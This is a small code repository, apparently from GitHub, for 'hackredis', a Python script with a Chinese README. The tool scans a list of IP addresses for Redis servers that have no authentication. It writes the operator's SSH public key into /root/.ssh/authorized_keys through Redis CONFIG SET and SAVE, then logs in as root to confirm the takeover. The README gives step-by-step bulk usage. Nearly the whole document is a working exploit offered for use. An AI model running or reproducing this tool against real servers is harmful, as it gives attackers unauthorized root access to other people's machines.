├── 1449803881546.png
├── README.MD
├── hackredis.py
└── ip.txt


/1449803881546.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/hackredis/fbae1bcadfe87d203e4fa11d73b717f1e1a3ad0a/1449803881546.png


--------------------------------------------------------------------------------
/README.MD:
--------------------------------------------------------------------------------
 1 | # hackredis
 2 | 之前@Matt写了一个批量扫描redis未授权的[脚本](https://github.com/code-scan/rescan)。然后我根据[Redis未授权访问导致可远程获得服务器权限](http://www.freebuf.com/vuls/85021.html)写了一个批量获取的脚本。暂时还没写多线程，写的很烂，凑活用吧。
 3 | 
 4 | **安装依赖**
 5 | ```
 6 | ☁  ~ sudo easy_install redis
 7 | ```
 8 | 
 9 | **使用**
10 | ```
11 | ☁  redis  python hackredis.py                                  
12 | usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT]
13 |                     [-pk PRIVATE_KEY]
14 | For Example:
15 | -----------------------------------------------------------------------------
16 | python hackredis.py  -l ip.txt -p 6379 -r foo.txt -sp 22 -pk /tmp/key
17 | 
18 | optional arguments:
19 |   -h, --help     show this help message and exit
20 |   -l IPLIST      the hosts of target
21 |   -p PORT        the redis default port
22 |   -r ID_RSAFILE  the ssh id_rsa file you generate
23 |   -sp SSH_PORT   the ssh port
24 |   -pk PRIVATE_KEY  the ssh private key
25 | ```
26 | 
27 | 首先需要ssh密钥:
28 | ```
29 | ☁  ~  ssh-keygen -t rsa
30 | ☁  ~  cp ~/.ssh/id_rsa.pub /tmp/foo.txt
31 | ```
32 | 
33 | 之后将ip列表填入ip.txt，然后就可以跑了。
34 | 成功的将会输出到success.txt,执行成功但是ssh连接失败的会存储在unconnect.txt，操作失败的会存储在fail.txt。
35 | 
36 | 测试截图：
37 | 
38 | ![Alt text](./1449803881546.png)
39 | 


--------------------------------------------------------------------------------
/hackredis.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | #coding:utf-8
  3 | #############################################################
  4 | ## @file    hackredis.py                                   ##
  5 | ## @date    2015-12-11                                     ##
  6 | ## @author  evi1cg                                         ##
  7 | #############################################################
  8 | import redis
  9 | import argparse
 10 | import textwrap
 11 | import sys
 12 | import pexpect
 13 | try:
 14 |    	import paramiko
 15 | except ImportError:
 16 |     print('Missing Paramiko Dependency.')
 17 |     sys.exit(0)
 18 | def getargs():
 19 | 	parser = argparse.ArgumentParser(prog='hackredis.py', formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''\
 20 | 	For Example:
 21 | 	-----------------------------------------------------------------------------
 22 | 	python hackredis.py  -l ip.txt -p 6379 -r foo.txt -sp 22 -pk /tmp/key'''))
 23 | 	parser.add_argument('-l', dest='iplist', type=str, help='the hosts of target')
 24 | 	parser.add_argument('-p', dest='port', default=6379, type=int, help='the redis default port')
 25 | 	parser.add_argument('-r', dest='id_rsafile', type=str, help='the ssh id_rsa file you generate')
 26 | 	parser.add_argument('-sp', dest='ssh_port', type=int,default=22, help='the ssh port')
 27 | 	parser.add_argument('-pk', dest='private_key', type=str, help='the ssh private key')
 28 | 	if(len(sys.argv[1:]) / 2 != 5):
 29 | 		sys.argv.append('-h')
 30 | 	return parser.parse_args()
 31 | 
 32 | def hackredis(host,port,key):
 33 | 	ck = 0
 34 | 	try:
 35 | 		print "[*] Attacking ip:%s"%host
 36 | 		r =redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2)
 37 | 		r.flushall
 38 | 		r.set('crackit',foo)
 39 | 		r.config_set('dir','/root/.ssh/')
 40 | 		r.config_set('dbfilename','authorized_keys')
 41 | 		r.save()
 42 | 		ck =1
 43 | 	except:
 44 | 		print "\033[1;31;40m[-]\033[0m Something wrong with %s"%host
 45 | 		write(host,2)
 46 | 		ck =0
 47 | 	if ck == 1:
 48 | 		check(host,key)
 49 | 	else:
 50 | 		pass
 51 | 
 52 | def check(host,key):
 53 | 	print '\033[1;33;40m[*]\033[0m Check connecting... '
 54 | 	try:
 55 | 		key=paramiko.RSAKey.from_private_key_file(key)
 56 | 		ssh=paramiko.SSHClient()
 57 | 		ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 58 | 		ssh.connect(hostname=host, username='root', pkey=key)
 59 | 		stdin, stdout, stderr=ssh.exec_command('id')
 60 | 		out = stdout.read()
 61 | 		if "root" in out:
 62 | 			print "\033[1;34;40m[+]\033[0m Success !"
 63 | 			write(host,1)
 64 | 		else:
 65 | 			pass
 66 | 	except:
 67 | 		print "\033[1;32;40m[-]\033[0m Failed to connect !"
 68 | 		write(host,3)
 69 | def write(host,suc):
 70 | 	if suc == 1:
 71 | 		filesname = 'success.txt'
 72 | 	elif suc ==2:
 73 | 		filesname = 'fail.txt'
 74 | 	elif suc ==3:
 75 | 		filesname = 'unconnect.txt'
 76 | 	else:
 77 | 		pass
 78 |   	file_object = open(filesname,'a')
 79 |   	file_object.write(host+'\n')
 80 |   	file_object.close()
 81 | 
 82 | 
 83 | def main():
 84 | 	global foo,ssh_port
 85 | 	paramsargs = getargs()
 86 | 	try:
 87 | 		hosts = open(paramsargs.iplist,"r")
 88 | 	except(IOError):
 89 | 		print "Error: Check your hostfile path\n"
 90 | 		sys.exit(1) 
 91 | 	port = paramsargs.port
 92 | 	ssh_port = paramsargs.ssh_port
 93 | 	key = paramsargs.private_key
 94 | 	try:
 95 | 		foo = '\n\n\n'+open(paramsargs.id_rsafile,"r").readline()+'\n\n\n'
 96 | 	except(IOError):
 97 | 		print "Error: Check your wordlist path\n"
 98 | 		sys.exit(1)     
 99 | 	ips = [p.replace('\n','') for p in hosts]
100 | 	for ip in ips:
101 | 		hackredis(ip.strip(),port,key)
102 | 
103 | 
104 | if __name__ == "__main__":
105 | 	main()
106 | 


--------------------------------------------------------------------------------
/ip.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ridter/hackredis/fbae1bcadfe87d203e4fa11d73b717f1e1a3ad0a/ip.txt


--------------------------------------------------------------------------------